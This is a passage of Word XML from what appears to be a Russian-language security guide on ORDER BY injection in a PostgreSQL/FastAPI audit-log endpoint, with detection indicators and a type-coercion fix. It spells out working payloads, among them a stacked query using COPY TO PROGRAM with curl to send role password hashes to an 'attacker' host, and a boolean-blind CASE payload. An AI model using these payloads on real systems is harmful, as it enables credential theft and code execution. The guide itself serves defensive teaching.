      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, user_id, action, target, occurred_at FROM audit_log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0CA0CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE occurred_at &gt; now() - interval '30 days'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08811DE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 99 ASC LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6418ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071D3449" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: ORDER BY position 99 is not in select list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066B957C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LINE 4: ORDER BY 99 ASC LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68527C07"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3F6D0B69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP-500 с error message в body. Атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>итерирует</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> N от 1 вверх: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort_col=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (200 OK), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort_col=2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (200 OK), ..., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort_col=5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (200 OK), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort_col=6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (500 ERROR) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select-list имеет ровно 5 колонок</w:t>
      </w:r>
      <w:r>
        <w:t>. Эта информация — основа для UNION-injection через любой другой endpoint того же приложения, который использует тот же select-list (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, user_id, action, target, occurred_at FROM audit_log</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555B8014" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант B — stacked queries (simple-protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D5D4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /admin/audit-logs?sort_col=1;%20COPY%20(SELECT%20rolname,rolpassword%20FROM%20pg_authid)%20TO%20PROGRAM%20'curl%20http://attacker/?d=$(cat%20-)'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D012B3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_col = "1; COPY (SELECT rolname,rolpassword FROM pg_authid) TO PROGRAM 'curl ...'--"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (simple-mode):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E49BF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT ... ORDER BY 1; COPY (SELECT rolname,rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F9C7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TO PROGRAM 'curl http://attacker/?d=$(cat -)'-- DESC LIMIT 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C630767" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если application-роль имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE через COPY TO PROGRAM (см. 3.7.1). В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>extended-mode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Сервер отвечает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1FE9C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — expression-injection в integer-position (любой драйвер):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2957B4AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /admin/audit-logs?sort_col=(CASE%20WHEN%20(SELECT%20rolsuper%20FROM%20pg_roles%20WHERE%20rolname=current_user)%20THEN%201%20ELSE%202%20END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB6522" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_col = "(CASE WHEN ... THEN 1 ELSE 2 END)"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44238EBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN ... THEN 1 ELSE 2 END) DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2327A3C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>PostgreSQL принимает expression в ORDER BY-position — это валидно, как описано в 3.14.0 (ORDER BY column_number и ORDER BY expression — две стороны одного clause). Boolean-leak через row-order: если current_user superuser, sort идёт по колонке 1 (id); иначе — по колонке 2 (user_id). Атакующий сравнивает порядок rows в response — boolean confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C2EF32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эта payload показывает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>граница между «column number» и «expression» в ORDER BY размыта</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — integer literal и expression используют один и тот же AST-node. PostgreSQL различает их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только по pattern</w:t>
      </w:r>
      <w:r>
        <w:t>: если node — integer constant ≤ select_list_size, это column reference; иначе — expression. Атакующий легко переходит границу через скобки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5F2C34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Variant A — определение select-list count → подготовка UNION-extraction. Variant B — RCE через stacked queries (требует privilege). Variant C — boolean-leak через row order, эскалация в 3.3 (boolean-blind extraction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F94F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Артефакты атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4572ABE9"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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (нетипичные column numbers), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от endpoint-а где ожидается простой integer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39DDDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages = error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: множественные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от того же IP — индикатор enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5601476B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   HTTP access-log: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_col=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит non-numeric characters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CASE</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1DAF70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>либо integer literal (column reference) либо expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Парсер сначала смотрит на токен: если это integer literal в диапазоне </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1..N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (где N = select_list_size), это column reference; иначе — expression. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>один AST-node</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SortGroupClause</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — с разными интерпретациями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE00DD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): *"Each expression can be the name or ordinal number of an output column (SELECT list item)... A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort_expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can also be an arbitrary expression formed from input-column values."* Граница между column-number и expression — синтаксическая (integer literal vs expression), не семантическая.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417ED242" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Поэтому защита через «использую column number вместо имени» — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ложная защита</w:t>
      </w:r>
      <w:r>
        <w:t>: парсер всё равно примет expression в той же позиции, если synthetic-integer (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1+0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) проходит. Реальная защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>type-coerce на стороне application</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395504D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/admin/audit-logs")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA6B3C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_audit_logs(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B7158" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort_col: int = Query(1, ge=1, le=5),    # ← int + range от 1 до len(select_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C482293" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    direction: Literal["ASC", "DESC"] = Query("DESC"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16632092" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E5393C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1957A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"SELECT ... ORDER BY {sort_col} {direction} LIMIT 100")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72604BB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ безопасно: sort_col гарантированно int 1..5, direction — Literal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344FED2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FastAPI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Query(ge=1, le=5)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> гарантирует, что parameter — integer в строго заданном диапазоне. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Literal["ASC", "DESC"]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для direction — то же самое для строки. Эти два cast делают f-string в SQL безопасной — даже если query-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?sort_col=99</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> придёт, FastAPI вернёт 422 ещё до маршрутизации в handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F0B49A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Error-канал (Variant A) не работает, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
